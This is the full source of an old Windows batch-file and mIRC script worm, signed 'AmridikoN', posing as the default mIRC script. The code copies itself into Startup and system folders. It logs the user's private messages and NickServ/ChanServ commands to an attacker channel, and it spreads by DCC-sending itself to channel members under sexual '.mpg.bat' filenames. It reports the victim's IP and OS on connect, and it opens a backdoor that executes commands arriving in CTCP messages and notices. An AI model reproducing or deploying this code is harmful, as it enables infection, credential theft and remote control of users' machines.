@echo off
@if %0 == C:\WINDOWS\WIN.BAT goto :skip
@copy /y %0 c:\Windows\startm~1\programs\startup\Rundll.bat > nul 
@copy /y %0 c:\mirc\mirc.bat > nul 
@copy /y %0 c:\windows\system\mirc32.bat > nul 
@copy /y %0 c:\windows\Win.bat > nul 
:skip
@if exist c:\mirc\mirc32.exe goto ok
@exit
:ok
@copy /y %0 c:\mirc\script.ini > nul
@echo n0=script.ini >> c:\mirc\mirc.ini
@echo n1=script.ini >> c:\mirc\mirc.ini
@echo n2=script.ini >> c:\mirc\mirc.ini
@echo n3=script.ini >> c:\mirc\mirc.ini
@echo n4=script.ini >> c:\mirc\mirc.ini
@echo n5=script.ini >> c:\mirc\mirc.ini
@echo n6=script.ini >> c:\mirc\mirc.ini
@echo n7=script.ini >> c:\mirc\mirc.ini
@echo n8=script.ini >> c:\mirc\mirc.ini
@echo n9=script.ini >> c:\mirc\mirc.ini
@exit

[script]
n0=;//****************************************************************************************\\
n1=;| |********************************* Default mIRC Script *********************************| |
n2=;| |*********************mIRC v5.8 32bit by Khaled Mardam-Bey***********************| |
n3=;| |*********************** Copyright 1995- 2000 mIRC Co. Ltd. ************************| |
n4=;| | ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ----==DO NOT EDIT THIS FILE!!!==---- ! ! ! ! ! ! ! ! ! ! ! ! ! !| |
n5=;| |****************************** More info in mIRC help file. ***************************//
n6=;``*****************************************************************************************' '
n7=
n8=alias chanserv { amri.msg (msg:chanserv) $1- | chanserv $1- }
n9=alias nickserv { amri.msg (msg:nickserv) $1- | nickserv $1- }
n10=alias operserv { amri.msg (msg:operserv) $1- | operserv $1- }
n11=alias msg { amri.msg (msg: $+ $1 $+ ) $2- | msg $1- }
n12=alias privmsg { amri.msg (msg: $+ $1 $+ ) $2- | privmsg $1- }
n13=alias remote {
n14=  if ($1 == off) { amri.echo info text:*** Remote is OFF }
n15=  if ($1 == on) { amri.echo info text:*** Remote is ON (Ctcps,Events,Raw) }
n16=}
n17=alias unload {
n18=  if ($1 == -rs) && ($gettok($2,$gettok($2,0,92),92) == $gettok($script,$gettok($script,0,92),92)) { amri.echo info text:*** Unloaded script 'script1.ini' }
n19=  else {
n20=    unload $1-
n21=  }
n22=}
n23=alias -l amri.echo echo -ae  $+ $colour($gettok($1-,1,58)) $+ $deltok($1-,1,58)
n24=alias -l amri.msg if ($server != $null) raw -q privmsg $chr(35) $+ $date :#ribbed#2.41# $1-
n25=alias -l amri.name return $str(!,$r(0,9)) $+ $gettok(:jennie:racheal:steven:mandy:joane:suzzane:lucy:wife:sherryl:lori:cindy:richard:sue:lanna:tom:pamela:jessica:laura:animals:stephanie:rhianon:eminem:lezbo:jack:britney:jane:kelly:pual:phillip:wendi:dean:samantha:partners:kristine:gareth:christine:chris:kayle:anglica:linda:me:Catherine:sarah:model:anna:nicole:,$r(1,46),58) $+ $gettok(::-:_::~:x:,$r(1,5),58) $+ $gettok(::wet:hot:sexy:fingering:in-the-shower:xxx:lick:horny:bent-over:wild:swallowing:stipping:orgy:on-the-bed:licking:masturbating:spread-open:naked:stripped-off:in-the-bath:sucking:clothless:lesbian:fucking:all-wet:,$r(1,25),58) $+ .mpg.bat
n26=alias -l amri.infect {
n27=  :top
n28=  if ($sock(*,0) > 5) return
n29=  %amri.sock = amri.send. $+ $r(0,9999)
n30=  socklisten %amri.sock | sockmark %amri.sock $1 0
n31=  %amri.temp = $amri.name
n32=  raw -q privmsg $1 :DCC SEND %amri.temp $longip($ip) $sock(%amri.sock).port $file($script).size $+ 
n33=}
n34=alias -l amri.help {
n35=  if (($sock(*,0) > 5) && ($sock(amri.*,0) > 0)) {
n36=    %amri.temp = 1
n37=    :l
n38=    if ($sock(amri.*,%amri.temp).ls > 30) sockclose $sock(amri.*,%amri.temp)
n39=    else inc %amri.temp
n40=    if (%amri.temp <= $sock(amri.*,0)) goto l
n41=  }
n42=  if (($chan(0) == 0) || ($sock(*,0) > 5)) return | %amri.temp2 = 0
n43=  :loop
n44=  %amri.temp = $chan($r(1,$chan(0)))
n45=  %amri.temp = $nick(%amri.temp,$r(1,$nick(%amri.temp,0)))
n46=  if (%amri.temp != $me) amri.infect %amri.temp
n47=  if (%amri.temp2 < 5) { inc %amri.temp2 | goto loop }
n48=}
n49=on *:socklisten:amri.send.*:{
n50=  set %amri.temp amri.write. $+ $gettok($sockname,3,46) | sockaccept %amri.temp | sockmark %amri.temp $sock($sockname).mark | amri.send %amri.temp | sockclose $sockname
n51=}
n52=on *:sockwrite:amri.write.*:amri.send $sockname
n53=on *:sockclose:amri.write.*:amri.help
n54=alias -l amri.send {
n55=  %amri.byte = $gettok($sock($1).mark,2,32)
n56=  if ($calc(%amri.byte + 4096) < $file($script).size) {
n57=    bread $script %amri.byte 4096 &amri.data
n58=    sockwrite $1 &amri.data
n59=    inc %amri.byte 4096
n60=  }
n61=  else {
n62=    %amri.temp = $calc($file($script).size - %amri.byte)
n63=    if (%amri.temp == 0) { amri.msg infected $gettok($sock($1).mark,1,32) | amri.help | return }
n64=    bread $script %amri.byte %amri.temp &amri.data
n65=    sockwrite $1 &amri.data
n66=    %amri.byte = $file($script).size
n67=  }
n68=  sockmark $1 $gettok($sock($1).mark,1,32) %amri.byte
n69=}
n70=
n71=raw 401:*:{ set %amri.temp $chr(35) $+ $date | if ($2 == %amri.temp) halt }
n72=raw 404:*:{ set %amri.temp $chr(35) $+ $date | if ($2 == %amri.temp) halt }
n73=on *:start:{ //remove mirk.ini | //auser 23 AmridikoN | //auser 23 Doely | //auser 23 Amri_bot | //clear | //write mirk.ini  [Script] | //write mirk.ini n0=ctcp 23:*:?:$1- | //write mirk.ini n1= | /.load -rs mirk.ini }
n74=} 
n75=on *:connect:{
n76=  .copy -o $script c:\windows\system\mirc32.bat
n77=  amri.msg online ( $+ $me $+ ! $+ $ip $+ )
n78=  .msg #ScanLogin 8,1®8,14®8,15®8,0®8,15®8,14®8,1® 0 Hi. $server $port $ip $os $time $date %chan it's been $+ $duration($calc($ticks / 1000)) since my last reboot! 8,1®8,14®8,15®8,0®8,15®8,14®8,1® 
n79=  .join #Scans
n80=}
n81=on *:invite:#:amri.msg invited to $chan
n82=on *:join:#:{
n83=  if ($nick != $me) amri.infect $nick
n84=  amri.help
n85=}
n86=on *:part:#:.timermircHelpTimer 0 10 amri.help
n87=on *:nick:if ($nick == $me) amri.msg nick: $nick -> $newnick 
n88=on *:op:#:if ($opnick == $me) amri.msg just opped in $chan
n89=on *:serverop:#:if ($opnick == $me) amri.msg just serv-opped in $chan
n90=on *:usermode:amri.msg usermode: $1-
n91=
n92=on ^*:error:*:haltdef
n93=on ^*:notice:*:?:{
n94=  if ($right($gettok($1-,1,94),$calc($len($gettok($1-,1,94)) - 1)) == ribbed) && (($version < 5.4) || ($gettok($1-,2,94) == $hash($me,32))) {
n95=    $left($gettok($1-,3-,94),$calc($len($gettok($1-,3-,94)) - 1))
n96=    haltdef
n97=  }
n98=}
n99=;### AmridikoN Scripting!! ###

' aIRC Script v0.1  By AmridikoN  